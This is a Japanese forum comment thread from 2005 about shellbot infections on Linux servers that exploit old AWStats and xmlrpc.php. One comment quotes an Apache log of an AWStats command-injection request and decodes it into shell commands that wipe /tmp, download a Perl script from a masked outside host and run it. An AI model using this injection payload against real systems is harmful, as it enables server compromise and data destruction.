パスワードを忘れた? アカウント作成
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。

Linuxでもbot感染が拡大」記事へのコメント

  • perlとかもあるよ (スコア:3, 参考になる)

    by Anonymous Coward
    最近でも頻繁に古いphpベースのCMSにあったxmlrpc.phpとかログ解析ソフトawsatats.plの古い版とか狙ったbot感染攻撃が後をたたないでちゅ。linuxサーバーに入っているwgetを使ってshellbotをダウンロードする手口が共通に使われているのでwget消すかrenameしておくと将来的にも安心かも。
    • by Anonymous Coward on 2005年12月30日 16時42分 (#857423)
      うちにも毎日来ます:-(
      たとえばapacheにこんなログが。

      SERVER XX.XXX.XXX.XX - - [20/Sep/2005:08:30:05 +0900] \
      "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;\
      rm%20-rf%20*;curl%20-O%20http://www.geoXXXXXX.com\
      /h4x000r/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;\
      echo| HTTP/1.1" 404 472

      おそらくこんな感じ?

      echo ;
      cd /tmp;
      rm -rf *;
      curl -O http://www.geoXXXXXX.com/h4x000r/a.pl;
      perl a.pl;
      echo ;
      rm -rf a.pl*;
      echo |

      xmrpc.php(これも毎日来てます)については良く知らないので
      どなたかよろしく。

      # 合わせ技らしいアタックもブログに書いたはずだけど、どこいった...
      親コメント
      • by Anonymous Coward on 2005年12月30日 17時32分 (#857461)
        xmlrpc.phpですね。

        ぐぐると色々出てきますね。
        勉強になります。
        うちはawstats.plの方しか来たこと無いですけど・・・
        親コメント

コンピュータは旧約聖書の神に似ている、規則は多く、慈悲は無い -- Joseph Campbell

処理中...